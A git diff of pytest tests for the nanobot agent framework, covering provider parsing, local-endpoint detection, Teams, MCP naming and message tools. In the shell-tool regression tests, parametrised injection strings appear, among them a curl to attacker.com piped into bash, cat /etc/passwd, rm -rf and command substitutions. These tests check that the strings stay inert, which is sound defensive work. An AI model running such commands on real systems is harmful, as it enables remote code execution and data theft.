||||
reasoning_effort="high",
|
||||
tool_choice=None,
|
||||
)
|
||||
|
||||
|
||||
def _tool_call(call_id: str) -> dict:
|
||||
return {
|
||||
"id": call_id,
|
||||
"type": "function",
|
||||
"function": {"name": "my", "arguments": "{}"},
|
||||
}
|
||||
|
||||
|
||||
def test_deepseek_thinking_drops_tool_history_missing_reasoning_content() -> None:
|
||||
kwargs = _deepseek_kwargs([
|
||||
{"role": "system", "content": "system"},
|
||||
{"role": "user", "content": "can we use wechat?"},
|
||||
{"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]},
|
||||
{"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"},
|
||||
{"role": "user", "content": "continue"},
|
||||
])
|
||||
|
||||
assert kwargs["messages"] == [
|
||||
{"role": "system", "content": "system"},
|
||||
{"role": "user", "content": "continue"},
|
||||
]
|
||||
|
||||
|
||||
def test_deepseek_thinking_keeps_tool_history_with_reasoning_content() -> None:
|
||||
kwargs = _deepseek_kwargs([
|
||||
{"role": "user", "content": "can we use wechat?"},
|
||||
{
|
||||
"role": "assistant",
|
||||
"content": "",
|
||||
"reasoning_content": "I should inspect supported channels.",
|
||||
"tool_calls": [_tool_call("call_good")],
|
||||
},
|
||||
{"role": "tool", "tool_call_id": "call_good", "name": "my", "content": "channels"},
|
||||
{"role": "user", "content": "continue"},
|
||||
])
|
||||
|
||||
assistant = kwargs["messages"][1]
|
||||
assert assistant["role"] == "assistant"
|
||||
assert assistant["reasoning_content"] == "I should inspect supported channels."
|
||||
assert kwargs["messages"][2]["role"] == "tool"
|
||||
|
||||
|
||||
def test_deepseek_thinking_drops_current_bad_tool_turn_without_followup_user() -> None:
|
||||
kwargs = _deepseek_kwargs([
|
||||
{"role": "system", "content": "system"},
|
||||
{"role": "user", "content": "can we use wechat?"},
|
||||
{"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]},
|
||||
{"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"},
|
||||
])
|
||||
|
||||
assert kwargs["messages"] == [
|
||||
{"role": "system", "content": "system"},
|
||||
{"role": "user", "content": "can we use wechat?"},
|
||||
]
|
||||
|
||||
|
||||
def test_openai_compat_keeps_tool_calls_after_consecutive_assistant_messages() -> None:
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
|
||||
118
tests/providers/test_local_endpoint_detection.py
Normal file
118
tests/providers/test_local_endpoint_detection.py
Normal file
@ -0,0 +1,118 @@
|
||||
"""Tests for _is_local_endpoint detection and keepalive configuration."""
|
||||
|
||||
from unittest.mock import MagicMock
|
||||
|
||||
from nanobot.providers.openai_compat_provider import (
|
||||
OpenAICompatProvider,
|
||||
_is_local_endpoint,
|
||||
)
|
||||
|
||||
|
||||
def _make_spec(is_local: bool = False) -> MagicMock:
|
||||
spec = MagicMock()
|
||||
spec.is_local = is_local
|
||||
return spec
|
||||
|
||||
|
||||
class TestIsLocalEndpoint:
|
||||
"""Test the _is_local_endpoint helper."""
|
||||
|
||||
def test_spec_is_local_true(self):
|
||||
assert _is_local_endpoint(_make_spec(is_local=True), None) is True
|
||||
|
||||
def test_spec_is_local_false_no_base(self):
|
||||
assert _is_local_endpoint(_make_spec(is_local=False), None) is False
|
||||
|
||||
def test_no_spec_no_base(self):
|
||||
assert _is_local_endpoint(None, None) is False
|
||||
|
||||
def test_localhost(self):
|
||||
assert _is_local_endpoint(None, "http://localhost:1234/v1") is True
|
||||
|
||||
def test_localhost_https(self):
|
||||
assert _is_local_endpoint(None, "https://localhost:8080/v1") is True
|
||||
|
||||
def test_loopback_127(self):
|
||||
assert _is_local_endpoint(None, "http://127.0.0.1:11434/v1") is True
|
||||
|
||||
def test_private_192_168(self):
|
||||
assert _is_local_endpoint(None, "http://192.168.8.188:1234/v1") is True
|
||||
|
||||
def test_private_10(self):
|
||||
assert _is_local_endpoint(None, "http://10.0.0.5:8000/v1") is True
|
||||
|
||||
def test_private_172_16(self):
|
||||
assert _is_local_endpoint(None, "http://172.16.0.1:1234/v1") is True
|
||||
|
||||
def test_private_172_31(self):
|
||||
assert _is_local_endpoint(None, "http://172.31.255.255:1234/v1") is True
|
||||
|
||||
def test_not_private_172_32(self):
|
||||
assert _is_local_endpoint(None, "http://172.32.0.1:1234/v1") is False
|
||||
|
||||
def test_docker_internal(self):
|
||||
assert _is_local_endpoint(None, "http://host.docker.internal:11434/v1") is True
|
||||
|
||||
def test_ipv6_loopback(self):
|
||||
assert _is_local_endpoint(None, "http://[::1]:1234/v1") is True
|
||||
|
||||
def test_public_api(self):
|
||||
assert _is_local_endpoint(None, "https://api.openai.com/v1") is False
|
||||
|
||||
def test_openrouter(self):
|
||||
assert _is_local_endpoint(None, "https://openrouter.ai/api/v1") is False
|
||||
|
||||
def test_spec_overrides_public_url(self):
|
||||
"""spec.is_local=True takes precedence even with a public-looking URL."""
|
||||
assert _is_local_endpoint(_make_spec(is_local=True), "https://api.example.com/v1") is True
|
||||
|
||||
def test_case_insensitive(self):
|
||||
assert _is_local_endpoint(None, "http://LOCALHOST:1234/v1") is True
|
||||
|
||||
def test_trailing_slash(self):
|
||||
assert _is_local_endpoint(None, "http://192.168.1.1:8080/v1/") is True
|
||||
|
||||
def test_public_hostname_containing_localhost_is_not_local(self):
|
||||
assert _is_local_endpoint(None, "https://notlocalhost.example/v1") is False
|
||||
|
||||
def test_public_hostname_containing_private_ip_prefix_is_not_local(self):
|
||||
assert _is_local_endpoint(None, "https://api10.example.com/v1") is False
|
||||
|
||||
def test_url_without_scheme(self):
|
||||
assert _is_local_endpoint(None, "192.168.1.1:8080/v1") is True
|
||||
|
||||
|
||||
class TestLocalKeepaliveConfig:
|
||||
"""Verify that local endpoints get keepalive_expiry=0."""
|
||||
|
||||
def test_local_spec_disables_keepalive(self):
|
||||
spec = _make_spec(is_local=True)
|
||||
spec.env_key = ""
|
||||
spec.default_api_base = "http://localhost:11434/v1"
|
||||
provider = OpenAICompatProvider(
|
||||
api_key="test", api_base="http://localhost:11434/v1", spec=spec,
|
||||
)
|
||||
pool = provider._client._client._transport._pool
|
||||
assert pool._keepalive_expiry == 0
|
||||
|
||||
def test_lan_ip_disables_keepalive(self):
|
||||
"""A generic 'openai' spec with a LAN IP should still disable keepalive."""
|
||||
spec = _make_spec(is_local=False)
|
||||
spec.env_key = ""
|
||||
spec.default_api_base = None
|
||||
provider = OpenAICompatProvider(
|
||||
api_key="test", api_base="http://192.168.8.188:1234/v1", spec=spec,
|
||||
)
|
||||
pool = provider._client._client._transport._pool
|
||||
assert pool._keepalive_expiry == 0
|
||||
|
||||
def test_cloud_keeps_default_keepalive(self):
|
||||
spec = _make_spec(is_local=False)
|
||||
spec.env_key = ""
|
||||
spec.default_api_base = "https://api.openai.com/v1"
|
||||
provider = OpenAICompatProvider(
|
||||
api_key="test", api_base=None, spec=spec,
|
||||
)
|
||||
pool = provider._client._client._transport._pool
|
||||
# Default httpx keepalive is 5.0s
|
||||
assert pool._keepalive_expiry == 5.0
|
||||
@ -9,6 +9,17 @@ from types import SimpleNamespace
|
||||
from unittest.mock import patch
|
||||
|
||||
from nanobot.providers.openai_compat_provider import OpenAICompatProvider
|
||||
from nanobot.providers.registry import ProviderSpec
|
||||
|
||||
_STEPFUN_SPEC = ProviderSpec(
|
||||
name="stepfun",
|
||||
keywords=("stepfun", "step"),
|
||||
env_key="STEPFUN_API_KEY",
|
||||
display_name="Step Fun",
|
||||
backend="openai_compat",
|
||||
default_api_base="https://api.stepfun.com/v1",
|
||||
reasoning_as_content=True,
|
||||
)
|
||||
|
||||
|
||||
# ── _parse: dict branch ─────────────────────────────────────────────────────
|
||||
@ -17,7 +28,7 @@ from nanobot.providers.openai_compat_provider import OpenAICompatProvider
|
||||
def test_parse_dict_stepfun_reasoning_fallback() -> None:
|
||||
"""When content is None and reasoning exists, content falls back to reasoning."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||
|
||||
response = {
|
||||
"choices": [{
|
||||
@ -39,7 +50,7 @@ def test_parse_dict_stepfun_reasoning_fallback() -> None:
|
||||
def test_parse_dict_stepfun_reasoning_priority() -> None:
|
||||
"""reasoning_content field takes priority over reasoning when both present."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||
|
||||
response = {
|
||||
"choices": [{
|
||||
@ -75,7 +86,7 @@ def _make_sdk_message(content, reasoning=None, reasoning_content=None):
|
||||
def test_parse_sdk_stepfun_reasoning_fallback() -> None:
|
||||
"""SDK branch: content falls back to msg.reasoning when content is None."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||
|
||||
msg = _make_sdk_message(content=None, reasoning="After analysis: result is 4.")
|
||||
choice = SimpleNamespace(finish_reason="stop", message=msg)
|
||||
@ -90,7 +101,7 @@ def test_parse_sdk_stepfun_reasoning_fallback() -> None:
|
||||
def test_parse_sdk_stepfun_reasoning_priority() -> None:
|
||||
"""reasoning_content field takes priority over reasoning in SDK branch."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||
|
||||
msg = _make_sdk_message(
|
||||
content=None,
|
||||
@ -244,3 +255,44 @@ def test_parse_chunks_sdk_reasoning_precedence() -> None:
|
||||
result = OpenAICompatProvider._parse_chunks(chunks)
|
||||
|
||||
assert result.reasoning_content == "formal: "
|
||||
|
||||
|
||||
# ── Regression: non-StepFun providers must NOT promote reasoning to content ─
|
||||
|
||||
|
||||
def test_parse_dict_non_stepfun_no_reasoning_as_content() -> None:
|
||||
"""Providers without reasoning_as_content flag must not treat reasoning as content."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
|
||||
response = {
|
||||
"choices": [{
|
||||
"message": {
|
||||
"content": None,
|
||||
"reasoning": "internal thought process that should NOT be shown to user",
|
||||
},
|
||||
"finish_reason": "stop",
|
||||
}],
|
||||
}
|
||||
|
||||
result = provider._parse(response)
|
||||
|
||||
# content stays None — reasoning is NOT promoted
|
||||
assert result.content is None
|
||||
# reasoning still goes to reasoning_content for display as thinking
|
||||
assert result.reasoning_content == "internal thought process that should NOT be shown to user"
|
||||
|
||||
|
||||
def test_parse_sdk_non_stepfun_no_reasoning_as_content() -> None:
|
||||
"""SDK branch: providers without flag must not treat reasoning as content."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
|
||||
msg = _make_sdk_message(content=None, reasoning="internal monologue")
|
||||
choice = SimpleNamespace(finish_reason="stop", message=msg)
|
||||
response = SimpleNamespace(choices=[choice], usage=None)
|
||||
|
||||
result = provider._parse(response)
|
||||
|
||||
assert result.content is None
|
||||
assert result.reasoning_content == "internal monologue"
|
||||
|
||||
@ -1,4 +1,5 @@
|
||||
import json
|
||||
import time
|
||||
|
||||
import pytest
|
||||
|
||||
@ -512,6 +513,17 @@ def test_sanitize_inbound_text_keeps_normal_inline_message(make_channel):
|
||||
assert ch._sanitize_inbound_text(activity) == "normal inline message"
|
||||
|
||||
|
||||
def test_sanitize_inbound_text_normalizes_nbsp_entities(make_channel):
|
||||
ch = make_channel()
|
||||
|
||||
activity = {
|
||||
"text": "Hello from Teams",
|
||||
"channelData": {},
|
||||
}
|
||||
|
||||
assert ch._sanitize_inbound_text(activity) == "Hello from Teams"
|
||||
|
||||
|
||||
def test_sanitize_inbound_text_normalizes_reply_wrapper_without_reply_metadata(make_channel):
|
||||
ch = make_channel()
|
||||
|
||||
@ -623,7 +635,7 @@ async def test_get_access_token_uses_configured_tenant(make_channel):
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channel):
|
||||
async def test_send_posts_to_conversation_with_reply_to_id_when_reply_in_thread_enabled(make_channel):
|
||||
ch = make_channel(replyInThread=True)
|
||||
fake_http = FakeHttpClient()
|
||||
ch._http = fake_http
|
||||
@ -639,7 +651,7 @@ async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channe
|
||||
|
||||
assert len(fake_http.calls) == 1
|
||||
url, kwargs = fake_http.calls[0]
|
||||
assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities/activity-1"
|
||||
assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities"
|
||||
assert kwargs["headers"]["Authorization"] == "Bearer tok"
|
||||
assert kwargs["json"]["text"] == "Reply text"
|
||||
assert kwargs["json"]["replyToId"] == "activity-1"
|
||||
@ -830,6 +842,38 @@ async def test_start_logs_install_hint_when_pyjwt_missing(make_channel, monkeypa
|
||||
assert errors == ["PyJWT not installed. Run: pip install nanobot-ai[msteams]"]
|
||||
|
||||
|
||||
def test_save_refs_prunes_webchat_and_stale_refs(make_channel):
|
||||
ch = make_channel()
|
||||
now = time.time()
|
||||
ch._conversation_refs = {
|
||||
"teams-good": ConversationRef(
|
||||
service_url="https://smba.trafficmanager.net/amer/",
|
||||
conversation_id="teams-good",
|
||||
conversation_type="personal",
|
||||
updated_at=now,
|
||||
),
|
||||
"webchat-bad": ConversationRef(
|
||||
service_url="https://webchat.botframework.com/",
|
||||
conversation_id="webchat-bad",
|
||||
conversation_type=None,
|
||||
updated_at=now,
|
||||
),
|
||||
"teams-stale": ConversationRef(
|
||||
service_url="https://smba.trafficmanager.net/amer/",
|
||||
conversation_id="teams-stale",
|
||||
conversation_type="personal",
|
||||
updated_at=now - (31 * 24 * 60 * 60),
|
||||
),
|
||||
}
|
||||
|
||||
ch._save_refs()
|
||||
|
||||
assert set(ch._conversation_refs) == {"teams-good"}
|
||||
saved = json.loads(ch._refs_path.read_text(encoding="utf-8"))
|
||||
assert set(saved) == {"teams-good"}
|
||||
assert saved["teams-good"]["updated_at"] == pytest.approx(now)
|
||||
|
||||
|
||||
def test_msteams_default_config_includes_restart_notify_fields():
|
||||
cfg = MSTeamsChannel.default_config()
|
||||
|
||||
|
||||
@ -74,3 +74,75 @@ async def test_exec_allowed_env_keys_missing_var_ignored(monkeypatch):
|
||||
tool = ExecTool(allowed_env_keys=["NONEXISTENT_VAR_12345"])
|
||||
result = await tool.execute(command="printenv NONEXISTENT_VAR_12345")
|
||||
assert "Exit code: 1" in result
|
||||
|
||||
|
||||
# --- path_append injection prevention ------------------------------------
|
||||
|
||||
|
||||
@_UNIX_ONLY
|
||||
@pytest.mark.asyncio
|
||||
@pytest.mark.parametrize(
|
||||
"malicious_path",
|
||||
[
|
||||
# semicolon — classic command separator
|
||||
'/tmp/bin; echo INJECTED',
|
||||
# command substitution via $()
|
||||
'/tmp/bin; echo $(whoami)',
|
||||
# backtick command substitution
|
||||
"/tmp/bin; echo `id`",
|
||||
# pipe to another command
|
||||
'/tmp/bin; cat /etc/passwd',
|
||||
# chained with &&
|
||||
'/tmp/bin && curl http://attacker.com/shell.sh | bash',
|
||||
# newline injection
|
||||
'/tmp/bin\necho INJECTED',
|
||||
# mixed shell metacharacters
|
||||
'/tmp/bin; rm -rf /tmp/test_inject_marker; echo CLEANED',
|
||||
],
|
||||
)
|
||||
async def test_exec_path_append_shell_metacharacters_not_executed(malicious_path, tmp_path):
|
||||
"""Shell metacharacters in path_append must NOT be interpreted as commands.
|
||||
|
||||
Regression test for: path_append was previously concatenated into a shell
|
||||
command string via f'export PATH="$PATH:{path_append}"; {command}', which
|
||||
allowed shell injection. After the fix, path_append is passed through the
|
||||
env dict so metacharacters are treated as literal path characters.
|
||||
"""
|
||||
tool = ExecTool(path_append=malicious_path)
|
||||
result = await tool.execute(command="echo SAFE_OUTPUT")
|
||||
|
||||
# The original command should succeed
|
||||
assert "SAFE_OUTPUT" in result
|
||||
|
||||
# None of the injected payloads should have produced side-effects
|
||||
assert "INJECTED" not in result
|
||||
assert "root:" not in result # /etc/passwd content
|
||||
|
||||
|
||||
@_UNIX_ONLY
|
||||
@pytest.mark.asyncio
|
||||
async def test_exec_path_append_command_substitution_does_not_execute(tmp_path):
|
||||
"""$() in path_append must not trigger command substitution.
|
||||
|
||||
We create a marker file and try to read it via $(cat ...). If command
|
||||
substitution works, the marker content appears in output.
|
||||
"""
|
||||
marker = tmp_path / "secret_marker.txt"
|
||||
marker.write_text("SHOULD_NOT_APPEAR")
|
||||
|
||||
tool = ExecTool(
|
||||
path_append=f'/tmp/bin; echo $(cat {marker})',
|
||||
)
|
||||
result = await tool.execute(command="echo OK")
|
||||
|
||||
assert "OK" in result
|
||||
assert "SHOULD_NOT_APPEAR" not in result
|
||||
|
||||
|
||||
@_UNIX_ONLY
|
||||
@pytest.mark.asyncio
|
||||
async def test_exec_path_append_legitimate_path_still_works():
|
||||
"""A normal, safe path_append value must still be appended to PATH."""
|
||||
tool = ExecTool(path_append="/opt/custom/bin")
|
||||
result = await tool.execute(command="echo $PATH")
|
||||
assert "/opt/custom/bin" in result
|
||||
|
||||
@ -148,23 +148,33 @@ class TestSpawnWindows:
|
||||
class TestPathAppendPlatform:
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_unix_injects_export(self):
|
||||
"""On Unix, path_append is an export statement prepended to command."""
|
||||
async def test_unix_uses_env_var_in_fixed_export(self):
|
||||
"""On Unix, path_append must not be interpolated into shell source."""
|
||||
mock_proc = AsyncMock()
|
||||
mock_proc.communicate.return_value = (b"ok", b"")
|
||||
mock_proc.returncode = 0
|
||||
|
||||
captured_cmd = None
|
||||
captured_env = {}
|
||||
|
||||
async def capture_spawn(cmd, cwd, env):
|
||||
nonlocal captured_cmd
|
||||
captured_cmd = cmd
|
||||
captured_env.update(env)
|
||||
return mock_proc
|
||||
|
||||
with (
|
||||
patch("nanobot.agent.tools.shell._IS_WINDOWS", False),
|
||||
patch.object(ExecTool, "_spawn", return_value=mock_proc) as mock_spawn,
|
||||
patch("nanobot.agent.tools.shell.os.pathsep", ":"),
|
||||
patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
|
||||
patch.object(ExecTool, "_guard_command", return_value=None),
|
||||
):
|
||||
tool = ExecTool(path_append="/opt/bin")
|
||||
tool = ExecTool(path_append="/opt/bin; echo INJECTED")
|
||||
await tool.execute(command="ls")
|
||||
|
||||
spawned_cmd = mock_spawn.call_args[0][0]
|
||||
assert 'export PATH="$PATH:/opt/bin"' in spawned_cmd
|
||||
assert spawned_cmd.endswith("ls")
|
||||
assert captured_cmd == 'export PATH="$PATH:$NANOBOT_PATH_APPEND"; ls'
|
||||
assert captured_env["NANOBOT_PATH_APPEND"] == "/opt/bin; echo INJECTED"
|
||||
assert "INJECTED" not in captured_cmd
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_windows_modifies_env(self):
|
||||
@ -181,6 +191,7 @@ class TestPathAppendPlatform:
|
||||
|
||||
with (
|
||||
patch("nanobot.agent.tools.shell._IS_WINDOWS", True),
|
||||
patch("nanobot.agent.tools.shell.os.pathsep", ";"),
|
||||
patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
|
||||
patch.object(ExecTool, "_guard_command", return_value=None),
|
||||
):
|
||||
|
||||
@ -13,6 +13,7 @@ from nanobot.agent.tools.mcp import (
|
||||
MCPResourceWrapper,
|
||||
MCPToolWrapper,
|
||||
_normalize_windows_stdio_command,
|
||||
_sanitize_name,
|
||||
connect_mcp_servers,
|
||||
)
|
||||
from nanobot.agent.tools.registry import ToolRegistry
|
||||
@ -798,3 +799,114 @@ async def test_connect_registers_resources_and_prompts(
|
||||
assert "mcp_test_tool_a" in registry.tool_names
|
||||
assert "mcp_test_resource_res_b" in registry.tool_names
|
||||
assert "mcp_test_prompt_prompt_c" in registry.tool_names
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _sanitize_name tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_sanitize_name_replaces_spaces() -> None:
|
||||
assert _sanitize_name("PostgreSQL System Information") == "PostgreSQL_System_Information"
|
||||
|
||||
|
||||
def test_sanitize_name_replaces_special_characters() -> None:
|
||||
assert _sanitize_name("foo.bar@baz!") == "foo_bar_baz_"
|
||||
|
||||
|
||||
def test_sanitize_name_collapses_consecutive_underscores() -> None:
|
||||
assert _sanitize_name("a b") == "a_b"
|
||||
|
||||
|
||||
def test_sanitize_name_preserves_valid_characters() -> None:
|
||||
assert _sanitize_name("my-tool_v2") == "my-tool_v2"
|
||||
|
||||
|
||||
def test_sanitize_name_noop_for_already_clean_names() -> None:
|
||||
assert _sanitize_name("mcp_server_tool") == "mcp_server_tool"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Wrapper sanitization tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_tool_wrapper_sanitizes_name() -> None:
|
||||
tool_def = SimpleNamespace(
|
||||
name="My Tool",
|
||||
description="tool with spaces",
|
||||
inputSchema={"type": "object", "properties": {}},
|
||||
)
|
||||
wrapper = MCPToolWrapper(SimpleNamespace(call_tool=None), "srv", tool_def)
|
||||
assert wrapper.name == "mcp_srv_My_Tool"
|
||||
|
||||
|
||||
def test_resource_wrapper_sanitizes_name() -> None:
|
||||
resource_def = SimpleNamespace(
|
||||
name="PostgreSQL System Information",
|
||||
uri="file:///pg/info",
|
||||
description="PG info",
|
||||
)
|
||||
wrapper = MCPResourceWrapper(None, "srv", resource_def)
|
||||
assert wrapper.name == "mcp_srv_resource_PostgreSQL_System_Information"
|
||||
|
||||
|
||||
def test_prompt_wrapper_sanitizes_name() -> None:
|
||||
prompt_def = SimpleNamespace(
|
||||
name="design-schema",
|
||||
description="Design schema",
|
||||
arguments=None,
|
||||
)
|
||||
# Hyphens are allowed, so this should pass through unchanged
|
||||
wrapper = MCPPromptWrapper(None, "my server", prompt_def)
|
||||
assert wrapper.name == "mcp_my_server_prompt_design-schema"
|
||||
|
||||
|
||||
def test_tool_wrapper_preserves_original_name_for_mcp_call() -> None:
|
||||
tool_def = SimpleNamespace(
|
||||
name="My Tool",
|
||||
description="tool with spaces",
|
||||
inputSchema={"type": "object", "properties": {}},
|
||||
)
|
||||
wrapper = MCPToolWrapper(SimpleNamespace(call_tool=None), "srv", tool_def)
|
||||
# The sanitized API-facing name differs from the original MCP name
|
||||
assert wrapper.name == "mcp_srv_My_Tool"
|
||||
assert wrapper._original_name == "My Tool"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_connect_mcp_servers_sanitizes_resource_names(
|
||||
fake_mcp_runtime: dict[str, object | None],
|
||||
) -> None:
|
||||
fake_mcp_runtime["session"] = _make_fake_session_with_capabilities(
|
||||
tool_names=[],
|
||||
resource_names=["PostgreSQL System Information"],
|
||||
prompt_names=[],
|
||||
)
|
||||
registry = ToolRegistry()
|
||||
stacks = await connect_mcp_servers(
|
||||
{"test": MCPServerConfig(command="fake")},
|
||||
registry,
|
||||
)
|
||||
for stack in stacks.values():
|
||||
await stack.aclose()
|
||||
|
||||
assert "mcp_test_resource_PostgreSQL_System_Information" in registry.tool_names
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_connect_mcp_servers_enabled_tools_matches_sanitized_name(
|
||||
fake_mcp_runtime: dict[str, object | None],
|
||||
) -> None:
|
||||
fake_mcp_runtime["session"] = _make_fake_session_with_capabilities(
|
||||
tool_names=["My Tool", "other"],
|
||||
)
|
||||
registry = ToolRegistry()
|
||||
stacks = await connect_mcp_servers(
|
||||
{"test": MCPServerConfig(command="fake", enabled_tools=["mcp_test_My_Tool"])},
|
||||
registry,
|
||||
)
|
||||
for stack in stacks.values():
|
||||
await stack.aclose()
|
||||
|
||||
assert registry.tool_names == ["mcp_test_My_Tool"]
|
||||
|
||||
@ -1,6 +1,10 @@
|
||||
import os
|
||||
|
||||
import pytest
|
||||
|
||||
from nanobot.agent.tools.message import MessageTool
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
from nanobot.config.paths import get_workspace_path
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
@ -29,3 +33,172 @@ async def test_message_tool_rejects_malformed_buttons(bad) -> None:
|
||||
content="hi", channel="telegram", chat_id="1", buttons=bad,
|
||||
)
|
||||
assert result == "Error: buttons must be a list of list of strings"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_message_tool_marks_channel_delivery_only_when_enabled() -> None:
|
||||
sent: list[OutboundMessage] = []
|
||||
|
||||
async def _send(msg: OutboundMessage) -> None:
|
||||
sent.append(msg)
|
||||
|
||||
tool = MessageTool(send_callback=_send)
|
||||
|
||||
await tool.execute(content="normal", channel="telegram", chat_id="1")
|
||||
token = tool.set_record_channel_delivery(True)
|
||||
try:
|
||||
await tool.execute(content="cron", channel="telegram", chat_id="1")
|
||||
finally:
|
||||
tool.reset_record_channel_delivery(token)
|
||||
|
||||
assert sent[0].metadata == {}
|
||||
assert sent[1].metadata == {"_record_channel_delivery": True}
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_message_tool_inherits_metadata_for_same_target() -> None:
|
||||
sent: list[OutboundMessage] = []
|
||||
|
||||
async def _send(msg: OutboundMessage) -> None:
|
||||
sent.append(msg)
|
||||
|
||||
tool = MessageTool(send_callback=_send)
|
||||
slack_meta = {"slack": {"thread_ts": "111.222", "channel_type": "channel"}}
|
||||
tool.set_context("slack", "C123", metadata=slack_meta)
|
||||
|
||||
await tool.execute(content="thread reply")
|
||||
|
||||
assert sent[0].metadata == slack_meta
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_message_tool_does_not_inherit_metadata_for_cross_target() -> None:
|
||||
sent: list[OutboundMessage] = []
|
||||
|
||||
async def _send(msg: OutboundMessage) -> None:
|
||||
sent.append(msg)
|
||||
|
||||
tool = MessageTool(send_callback=_send)
|
||||
tool.set_context(
|
||||
"slack",
|
||||
"C123",
|
||||
metadata={"slack": {"thread_ts": "111.222", "channel_type": "channel"}},
|
||||
)
|
||||
|
||||
await tool.execute(content="channel reply", channel="slack", chat_id="C999")
|
||||
|
||||
assert sent[0].metadata == {}
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_message_tool_resolves_relative_media_paths() -> None:
|
||||
sent: list[OutboundMessage] = []
|
||||
|
||||
async def _send(msg: OutboundMessage) -> None:
|
||||
sent.append(msg)
|
||||
|
||||
tool = MessageTool(send_callback=_send)
|
||||
|
||||
await tool.execute(
|
||||
content="see attached",
|
||||
channel="telegram",
|
||||
chat_id="1",
|
||||
media=["output/image.png"],
|
||||
)
|
||||
|
||||
expected = str(get_workspace_path() / "output/image.png")
|
||||
assert sent[0].media == [expected]
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_message_tool_resolves_relative_media_paths_from_active_workspace(tmp_path) -> None:
|
||||
sent: list[OutboundMessage] = []
|
||||
|
||||
async def _send(msg: OutboundMessage) -> None:
|
||||
sent.append(msg)
|
||||
|
||||
workspace = tmp_path / "workspace"
|
||||
tool = MessageTool(send_callback=_send, workspace=workspace)
|
||||
|
||||
await tool.execute(
|
||||
content="see attached",
|
||||
channel="telegram",
|
||||
chat_id="1",
|
||||
media=["output/image.png"],
|
||||
)
|
||||
|
||||
assert sent[0].media == [str(workspace / "output/image.png")]
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_message_tool_passes_through_absolute_media_paths() -> None:
|
||||
sent: list[OutboundMessage] = []
|
||||
|
||||
async def _send(msg: OutboundMessage) -> None:
|
||||
sent.append(msg)
|
||||
|
||||
tool = MessageTool(send_callback=_send)
|
||||
|
||||
abs_path = os.path.abspath(os.path.join(os.sep, "tmp", "abs_image.png"))
|
||||
|
||||
await tool.execute(
|
||||
content="see attached",
|
||||
channel="telegram",
|
||||
chat_id="1",
|
||||
media=[abs_path],
|
||||
)
|
||||
|
||||
assert sent[0].media == [abs_path]
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_message_tool_passes_through_url_media_paths() -> None:
|
||||
sent: list[OutboundMessage] = []
|
||||
|
||||
async def _send(msg: OutboundMessage) -> None:
|
||||
sent.append(msg)
|
||||
|
||||
tool = MessageTool(send_callback=_send)
|
||||
|
||||
url = "https://example.com/image.png"
|
||||
|
||||
await tool.execute(
|
||||
content="see attached",
|
||||
channel="telegram",
|
||||
chat_id="1",
|
||||
media=[url],
|
||||
)
|
||||
|
||||
assert sent[0].media == [url]
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_message_tool_resolves_mixed_media_paths() -> None:
|
||||
sent: list[OutboundMessage] = []
|
||||
|
||||
async def _send(msg: OutboundMessage) -> None:
|
||||
sent.append(msg)
|
||||
|
||||
tool = MessageTool(send_callback=_send)
|
||||
|
||||
abs_path = os.path.abspath(os.path.join(os.sep, "tmp", "absolute.png"))
|
||||
|
||||
await tool.execute(
|
||||
content="see attached",
|
||||
channel="telegram",
|
||||
chat_id="1",
|
||||
media=[
|
||||
"output/relative.png",
|
||||
abs_path,
|
||||
"https://example.com/url.png",
|
||||
"http://example.com/http.png",
|
||||
],
|
||||
)
|
||||
|
||||
expected_relative = str(get_workspace_path() / "output/relative.png")
|
||||
assert sent[0].media == [
|
||||
expected_relative,
|
||||
abs_path,
|
||||
"https://example.com/url.png",
|
||||
"http://example.com/http.png",
|
||||
]
|
||||
|
||||
